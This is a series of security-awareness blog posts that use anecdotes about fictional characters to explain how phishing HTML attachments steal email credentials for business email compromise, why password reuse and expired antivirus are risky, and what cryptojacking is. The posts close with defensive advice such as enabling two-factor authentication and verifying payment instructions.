Hacking Email Accounts for BEC

Yep, Business Email Compromise (BEC) is a thing. (If you don’t believe me, read this, this and this.) There’s also an ugly step-sister of BEC that some people are calling Vendor Email Compromise (VEC).

Whatever you call it, a key step in these schemes usually involve an attacker gaining access to someone’s email account. Whether this be the victim’s, their vendor’s or their client’s email account. Why? Well the attacker wants to understand things like how the money flows in the targeted company, who is responsible for making payments and what the prerequisites are for someone in that company to act on payment instructions. Remember, they are trying to trick their target into thinking that they are communicating with a legitimate someone. The end goal usually being to get a victim to act on a fraudulent payment instruction or to change an existing vendor’s or client’s bank account to a new fraudulent account number. Not the most technical hacking ever, but these guys are patient, persistent and effective.

So, before the BEC scam gets into full swing, the attacker needs to get access (hack) their target’s email account. How do they do this? Well, the answer is “it varies” (like with most things in Infosec).

Often times it will start with something like either a bulk or targeted phishing campaign. One example is where an attacker will send an email posing as a supplier with an urgent outstanding invoice, something that will get the average person’s attention. Now, let’s pause for a moment. Before you roll your eyes and mutter ‘you can’t patch stupid!’… humor me for a bit with a story from Hypothetical Jack:

Story Time

It’s just after 14:00 on Monday afternoon. The long weekend from which hypothetical Jack and his family returned on Sunday evening remains a distant memory. Bogged down in his 2×2 cubicle, Jack reminisces about the Certified-Karoo-free-range lamb chops they braaied on Saturday evening under a clear sky. He can still hear the distant howling of a black-backed jackal echoing through the Waterberg mountains, each time the clacking sound of his fingers pounding away at his laptop’s keyboard subsides for a brief moment. Strangely enough, this time the howling seems to get louder, almost like the jackal is stalking his cubicle…. “Jack! Snap out of it!” and like that the harsh voice of his colleague Gertrude abruptly rips him out of his daydream and smacks him down on his high-back orthopedic office chair. “Peter is waiting for your monthly financial report card. He wants it before 4 today. It’s month end, remember…”

Jack reluctantly realigns his grey matter back to the humdrum of checking multiple spreadsheets and adding meaningless Gantt charts to an even more meaningless PowerPoint month-end presentation. Flipping between sheets, his eye catches the Outlook pop-up notification appearing from the right bottom of his screen. He was able to make out something about an outstanding invoice due this week before it disappeared again behind his litter of open spreadsheets.

Jack’s squirrel instinct takes over as he conveniently forgets about his looming month-end deadline and clicks over to Outlook to find the following email:

Jack has never dealt with “New Real Supplies CC” before and concludes that this is likely a new vendor they are dealing with. As he stares at the attachment, he remembers the one thing they taught him in his Information Security Awareness training session: DON’T CLICK LINKS.

“Well, I’ve got 99 problems but the link ain’t one” Jack mumbles as he opens the Payment Invoice.html attachment promising a 25% discount for early payment.

We’ll pause the story here for now. The point is that in a high-stress-multi-tasking-deadline-driven-environment, it doesn’t take much to lure Hypothetical Jack into opening an attachment from an unknown source.

Dodgy HTML Attachments

Let’s look at two real world examples of how attackers use HTML attachments to trick users into revealing their email account credentials. Remember, Jack is expecting to see some sort of invoice as indicated in the email message…

Attachment one: The Blurred Invoice

Have a closer look. The attackers did a great job with this one. Once the attachment is opened in a user’s browser, it shows a blurry ‘invoice’ document in the background. All that now stands between Jack and the un-blurred ‘invoice’, is this box asking for his email address and password:

Let’s have a look what happens when you enter your details in the form and click the “View Document” button.

To do this, we’ll look at the source code of the Payment Invoice.html attachment. Firstly, this shows a poor attempt at hiding the actual code with a <!-- Source code not available ... --> comment at the top of the page:

Scrolling down, you eventually get to the real, but quite hectically obfuscated source code:

Now, you can do either one of two things at this stage:

  1. Spend your Friday afternoon attempting to make sense of the obfuscation OR
  2. Open the attachment in a controlled environment, run something like Fiddler to capture HTTP traffic while you enter an email address and password in the form and hit “View Document”.

Naturally, I opted for Option 2 which gave use the following output in Fiddler:

From the above you can see that whatever the user enters into the “Email ID” and “Email Password” fields gets shipped off to the attackers URL. They now have a username and password to log into the victims email account.

Attachment 2: PDF File Inside

This one is all nice and official looking, even with a fake McAfee “Secured Page” badge. Again it is asking the user to enter their email address and password to access the document.

Having a look at the source code of the above gives the following obfuscated code:

This time it’s fairly easy to de-obfuscate the code. The above conforms to Hexadecimal code, so an easy way to decode this is to pop it into CyberChef. One of the myriad functionalities of CyberChef is to decode hex code to ASCII. Adding the above to the ‘Input’ box in CyberChef while selecting the hex decode recipe, gives you the following: (Note the Output box)

Scrolling through the decoded source code of the attachment brings us to the following section:

Here we again see that all this page does is to capture what the user entered in the form (i.e. email username and password) and ship that off the the attacker’s URL. No actual invoice for the victim to view, while the attackers are helping themselves to an email inbox using the newly acquired username and password.

Final Thoughts

Attackers will continue coming up with innovative ways to target users. As seen in these examples, they are luring users into entering their email credentials in order to get access to an ‘urgent invoice’.

Here are 2 ways that could assist in mitigating these type of attacks:

  1. Secure your email. One step that can go a long way is to enable 2FA / MFA (Multiple forms of authentication). This will assist in preventing an attacker from logging into an email account, even though they were able to obtain the username and password of the account. They’ll still need an additional form of authentication (such as a uniquely generated code sent to a trusted device) to be able to log in.
  2. Review your payment processes. Put extra validation processes in place to ensure payment instructions received via email is actually coming from who they say they are coming from. The following scenarios are often used by attackers:
    • A request is sent to a company to change banking details for an “existing” client. Attackers attempt to get them to pay a legitimate invoice into a fraudulent bank account.
    • An urgent payment needs to be made to a new account. Attackers attempt to impersonate a supplier or even the company’s CFO, requesting his staff to urgently act on a fraudulent payment instruction.

Security Awareness – One Password To Rule ‘em All

This is part 2 of our look into the life of Frik and his daughter Marietjie. (Catch part 1 here)

During August 2018, Frik’s plumbing business went through a bit of a slump. Business was slow, the clients he had were increasingly difficult and drains didn’t clog as they used to.

In order to unclog Frik’s business (pardon the pun) Marietjie had an idea: “Why not up your social media presence?

At this stage, Marietjie was the family social media expert: Dishing out advice on creating WhatsApp stories, doing live video streaming via Facebook and even helping Gran with applying Snapchat stickers. Frik decided to give it a shot, after all, nothing to loose, right? Facebook, Instagram, Snapchat, WhatsApp, Youtube, you name it and Plumber Frik had a profile. Marietjie also convinced him to change his online profiles from ‘Plumber Frik’ to ‘Plombier Frik’.

It will appeal to a more sophisticated clientele” she said.

Pretty soon Plombier Frik was the most followed plumber on Social Media in all of the East Rand. Doing live Facebook broadcasts while unclogging shower traps, creating how-to videos on setting your geyser thermostat and Instagramming before and after photos when replacing burst galvanized pipes. However, keeping track of all his social media profiles were a bit of a mission. Luckily, he had developed a nifty approach…

One password to rule them all, One password to find them, One password to bring them all, and in the darkness bind them.

Ok, to be honest, Frik has only watched the first half of the first LOTR movie (never mind having read the books). So this quote is a bit out of place for Frik, but please, humor me:

One fateful evening, Frik went through his list of social media accounts. One by one he changed each password to GeeVirFriknDruk007. (The equivalent of “Give Frik a Hug 007” for our English speaking listeners). Each account Frik changed was like a step closer to Mordor. The password started to burn him, he just had to use it again. And again. And again. By 1:30am that evening, Frik had changed everything, including his Gmail account password to GeeVirFriknDruk007.

By 1:30am that evening, Frik had changed everything, including his Gmail account password to GeeVirFriknDruk007.

“Lekker man, lekker” Frik said to himself.

As Frik’s social media following increased, so did the fan mail. Ladies from Prieska to Pretoria were sending him email, asking about his thick Afrikaans accent, where he grew up, what size wrench was his favorite and every now and again the odd question about re-enamelling old baths.

The fan mail started to take up a lot of Frik’s free time, but he wasn’t going to disappoint his newly acquired fan base. He still remembers the rejection he felt as a young man in 1996 when Neil Tovey didn’t respond to the letter he wrote him after Bafana Bafana’s African Cup of Nations victory. No, he’ll respond to each and every email. After a while, Frik established a nice rhythm. Monday to Thursday nights after dinner, he’ll settle into his favourite lazy chair in the living room, put on some sweet tunes from Albert Frost and respond.

Late one evening, just as Frik was wrapping up his last few fan mail responses, he received an email:

“Dear Frik,

We are importers of only the highest quality copper pipe bends.

For your perusal, we’ve attached our latest price list to this email.

Looking forward to doing business with you.

Kind regards,

Mr G Ollum.”

Ah, this should be interesting.” Frik thought to himself. “I wonder if they’ll beat the prices of Frodo’s Plumbing Supplies around the corner?

The email had a single attachment: ‘Price List.html

Clicking on the attachment opened Internet Explorer. Next loaded a Google Docs page.

Marietjie! Frik yelled.

Ja dad, whats wrong? She replied.

“What’s Google Docs?”

“It’s a thing from Google where you can create and edit documents in the cloud. Why?”

“A supplier send me a price list on Google Docs. Is it safe?”

“Yes, don’t worry.”

“Ok, it’s asking me to log in or register.”

“Just use your Gmail account to log in”

After Frik enters his Gmail username and password, the page seems to load, but only comes back to a Gmail login page.

Frik tries again, this time the page loads and redirects back to Google.

“Marietjie, it’s not working!”

“Ok dad, can I check tomorrow?”

“Ja, ok” Frik closes his laptop and stands up from his lazy chair. As the closing theme of tonight’s NCIS: Los Angeles episode plays in the background, he meanders off to bed.

The next morning, just before the crack of dawn, a strange thing started to happen. While Frik was happily snoring away, his social media accounts undergone an evolution of sorts.

In stead for being all about plumbing, it was now showing pictures advertising Ray Ban sunglasses at 90% discount!

Frik could not log in to any of his accounts anymore.

Amazing!” Frik thought to himself later in the day as he stared at a pair of Ray Ban Aviators for only R199 shown on his Instagram page. There was one issue however, Frik could not log in to any of his accounts anymore. Nothing wanted to work: Facebook, Instagram, Pinterest and Twitter. That’s odd, he thought. Alas, let’s reset the passwords for the lot.

As he went through the “Forgot my Password” option on each website, he waited with great anticipation for the familiar “ding” his phone makes when a new email arrives. However, this time Frik was only met with deafening silence. As he opened his Gmail app on his phone, he was greated with a login screen. “Odd” he thought. Entering his username and password however changed “Odd” to “Oh no“. He now could also not log into his email either.

What happened?

Frik got Phished. Properly phished. The email that he thought he received from a supplier was in fact a phishing email. An email from an attacker pretending to be a supplier. This message was specially crafted to convince Frik to open the attached Price List.html file. Once opened, it loaded a fake Google Docs page in stead of an actual price list. Again, this was just a rouge to trick him into entering his Google username and password. Once entered, his username and password was sent to that attacker without him realising.

This was just a rouge to trick him into entering his Google username and password.

Following a careful study of his email communications by the attacker, they were able to get access to his social media accounts. “How?” You might ask. Well, in this case they only had to use his email address and password, off course! Frik had the same username and password for each account. Basically the same key for every lock he had. As such, stealing one key provided access to all the locks.


Enter Two Factor Authentication (2FA)

Phishing is a problem, yes. However, two factor authentication (2FA) may have prevented this. 2FA is the tech that uses two ways of authenticating you when you sign on. Typically, this translates to you using a username and password combination to log in, as well as entering an additonal passcode sent to your mobile phone.

Had this been enabled, the attacker wouldn’t have had the ability to log in to any of Frik’s accounts, even though they had his user name and password. This is because the 2FA passcodes would have been sent to his mobile phone, leaving the attacker high and dry.

“But how do I enable this magic?” I hear you ask. Below is a list of common platforms with their how-to guides on enabling 2FA:

And lastly, password reuse is bad. Don’t do it, just don’t. Use a password manager that allows you to securely store passwords for your accounts. This will enable you to generate secure, unique passwords for each place you log on. A good free one you can have a look at is LastPass.

Security Awareness – Meet Frik and Marietjie.

October is National Cyber Security Awareness Month (NCSAM). Although NCSAM is United States initiative promoting Cyber Security Awareness during the month of October, the rest of the world usually jumps on the bandwagon as well. So, it’s becoming more like International Cyber Security Awareness Month.

During the month of October, large volumes of (usually) very valuable information are published regarding information security awareness. This month, I shall join the fray with a couple of stories promoting Security Awareness. Let’s go.


Frik and Marietjie:

Meet Frik. Or rather, allow me to be more descriptive, meet Frik the plumber. Frik is your typical East Rand plumber. A good guy at heart, not too fond of technology, unless you’re referring to Showmax (but he’s starting to adapt). In the last couple of years, Frik’s business has grown tremendously and he has had to enroll the services of his eldest daughter, Marietjie, to assist with the admin side of things. Frik is able to do miracles with copper pipe, a shifting spanner and some soldering wire, but generating invoices and keeping track of payments isn’t his strong suite. This brings us to Marietjie, who has always been the tech savvy one in the family. Some of her friends would call her a tech guru, due to her being one of a select few in their close circle with the ability to type with two hands. She uses a newly bought desktop to generate invoices, pay Frik’s suppliers and verify electronic payments made by his clients.

Marietjie is however easily distracted, disappearing down Instagram rabbit holes for hours at a time. When it’s not Instagram, she keeps up with happenings on Facebook, Twitter & News24. Don’t forget the daily musings of her personal diary on Evernote. This all done from her Android phone.

At this stage, everyone is probably asking: Marietjie, did you install an antivirus application on the desktop?

Answer: “Oh cool, a new season of Greys Anatomy. Still can’t believe they let McDreamy die… Oh, you asked about antivirus. Yes off course, the thing came pre-installed with some antivirus thing. Don’t worry.

Every now and again, Marietjie skims by an article on Twitter about some sort of hacker thing. “Hackers gonna hack” she ponders as she scrolls away. On Tuesday, midway between one of her regular afternoon Showmax binges, an email notification pops up on the desktop. With one eye on the computer screen and the other on the latest episode of Grey’s, she swiftly deduces it’s some supplier sending an invoice.

A new invoice has been generated, please click <<here>> to view.” the email reads.

Click goes the mouse.

Marietjie pauses abruptly. “What just happened? What’s going on?? Meredith just said the patient’s tumor is inoperable, and now the red head army ginger guy is pushing him to the theater for emergency life saving surgery?“.

Meanwhile on the computer: “Error 500 – The page you are looking for cannot be displayed”.

That’s odd she thinks, I thought Meredith knew how to interpret brain scans? How could she make such a mistake?

F5 (refresh), still the invoice isn’t loading. She taps F5 a couple more times. “Well, if they really want us to pay, they need to sort out their system. Anyway, I’ll deal with it later.” Whilst Marietjie starts to meaninglessly scroll through Pinterest posts about dog blanket ideas for her new Yorkshire Terrier puppy, the desktop’s processor begins churning away.

The ‘broken’ link she so ferociously clicked on in the email wasn’t broken. It was purposely showing her a fake error message, whilst in the background executing a browser exploit. Basically this malicious link she clicked, unknown to her, led to all sorts of nasty files being downloaded and executed on the system. This desktop Marietjie is using for invoicing, online banking and email communication with Frik’s clients, is now infected with a Remote Access Trojan, a RAT. As a new episode of Grey’s start, the RAT begins to secretly communicate back to it’s master via the internet. This includes daily updates of what Marietjie is doing on the computer, where she logs in and who she emails. It even takes screenshots of those Google searches for “does Yorkshire Terriers like perfume?” and “why did they call him Mc Dreamy?”.

But wait. Remember earlier when we asked Marietjie about antivirus and she so confidently replied between Mc Dreamy comments that it came with the computer? Taking a closer look reveals that there was indeed an antivirus application which came preinstalled with the desktop. What our dear Marietjie failed to notice was, that this was only a 30-day trial. After the initial 30 days passed, the protection stopped working. In essence, her antivirus last protected the desktop while Mc Dreamy was still alive and in love with Meredith.

This brief look into Marietjie’s life highlighted two important concepts:

  1. Be careful of what you click on. Bad guys make use of email messages to trick you into compromising your security. This can be in the form of an attachment, which masquerades itself as a document but in actual fact is packed full of bad things. Another method, as in Marietjie’s case, is a link included in an email message which when clicked, goes to a bad website to download more bad stuff to your computer. There are a lot more sly tricks attackers may use to compromise your system, but these examples will do for now.
  2. Install and check up on your antivirus application. Remember: “if it ain’t running it ain’t protectin’ “. You get the point. It also need to be regularly updated. Using an outdated antivirus is like a police officer looking for criminals in 2018, with a Most Wanted list from 1980.

#Cryptojacking – A ‘Not Too Technical’ Story


Bitcoin, blockchain, bitcoin mining, mining bitcoin on the blockchain, using the blockchain to mine bitcoin in order to buy Ethereum so that you can in turn buy stuff on the dark web. Yeah, that doesn’t make a lot of sense. Now, add another word to the already confusing list of cryptocurrency terms: #Cryptojacking.

Side note: The term Cryptojacking is not to be confused with malware families like CryptoShuffler or ComboJack. These are geared towards stealing actual bitcoin.

Cryptojacking however is when a victim’s computing resources are hijacked and used to mine cryptocurrency. On a basic level, this means that the targeted computer’s processor and GPU are used by an attacker to process the complex algorithms as part of cryptocurrency transactions. The resulting reward (coins) from the mining is then received by the attacker.

Currently, there are two flavours of Cryptojacking:

  1. Via the browser. When a user visits a website that has a cryptomining script enabled, the processing power available from the user’s computer is used, via the browser, to mine cryptocurrency. Mining scripts are often added to compromised websites where mining takes place without a user’s knowledge or consent. The malicious mining seizes once the browser tab for the infected website is closed.
  2. Via malware infections. Cryptojacking malware running on an infected computer will allow for continuous mining. An example of this is the Powerghost miner.

Cryptojacking is in essence the digital equivalent of someone breaking into your tool shed at night and, instead of stealing your stuff, they use your tools:

Creating amazing wood furniture, those projects you see on Pinterest where a guy with a leather tool belt takes old wood pallets and creates the most amazing chest of drawers within 22minutes, flat.

Is Cryptojacking an issue that deserves priority?

This is a legitimate question, seeing that ‘no one is getting hurt‘.

Let’s continue with our tool shed analogy: You now suspect that someone is making use of your tools at night. Do you interrupt your hard earned sleep and hold a stake out to catch the bugger? Or should you rather focus on the real criminals that might actually steal your stuff?

Although our miscreant is bringing along his own upcycled pallets, he is still using your machinery. Say he does it once or twice a month, that ain’t bad you think. But, unfortunately, he does not have the woodworking finesse of Nick Offerman, and for all you know, he’s doing it every night. Using your electricity, breaking your drill bits, leaving the wood glue bottle open and not to mention the wear and tear of your machinery. Some nights he even let your mitre saw run for 8 hours straight, allowing it to overheat and damage the motor.

This guy is now pretty much spending 12 hours a night, 7 nights a week in your tool shed, which also gives him time to look around the yard. One night during a smoke break, he sees that kitchen window with the broken latch you’ve been meaning to fix for the last 4 Saturdays. Miscreant ponders to himself: “A cup of coffee would sure be nice…

As you wake up the next morning, you realise that our miscreant was in your kitchen and used your last batch of Legado Guatemalan Finca El Rincon single origin coffee beans to create the smoothest of cappuccinos in your newly Italian imported Rocket Espresso machine.

As you sip on a stale cup of instant coffee (which you think to yourself tastes more like a cardboard box than pure exhilarating caffeine), you decide that this was the last straw… It is time for action. That afternoon , you swing by the local hardware store and buy a new window latch and a proper hardened steel padlock for the shed. “That’ll keep ‘em out” you think to yourself as you lock the shed and smile at the newly fixed kitchen window latch.

The next morning, as you awake from a restful sleep, you stroll down to the kitchen, already planning an amazing breakfast for the missus (eggs benedict with a chili hollandaise sauce and streaky bacon).

“This is going to be the best…. WORST BREAKFAST EVER!!”.

It’s gone. Everything is gone. Your fridge with the eggs and streaky bacon, gone. Your vegetable rack with the fresh chilies, gone. Your Rocket Espresso machine… GONE. As the horror of what could only have happened during the night dawns upon you, your eye catches a glimpse of the open patch of lawn where your tool shed once stood. FREAKIN GONE. How the dangit did someone steal a tool shed and MY ENTIRE KITCHEN?

During the next few hours as policemen walk up and down the yard looking for clues, it dawns upon you. The woodworking miscreant had other skills as well. He wasn’t only a Pinterest level craftsmen, but also a master thief (he was able to carry away your entire kitchen without you waking up), a pretty decent truck driver (reversing a flatbed truck down your driveway and lifting your tool shed takes some work) and a meticulous planner. During the past week of night time craftsmanship, the miscreant cloned your house keys and your gate remotes. This allowed him to open front the gate with a remote, reverse the truck in and unlocked the kitchen door after loading the shed.

Fairly dramatic, yes, but the take home remains:

Cryptojackers aren’t just a nuisance. In the recent case of the Rakhni Miner, upon successful infection, the malware makes the decision if it wants to encrypt your data (Ransomware) or if it is going to use your resources to mine cryptocurrency.

If there are Cryptojackers running around in your environment, it should be a red flag that there are some definite weaknesses that needs to be addressed within your environment.


For further reading on cryptojacking, have a look at the following articles: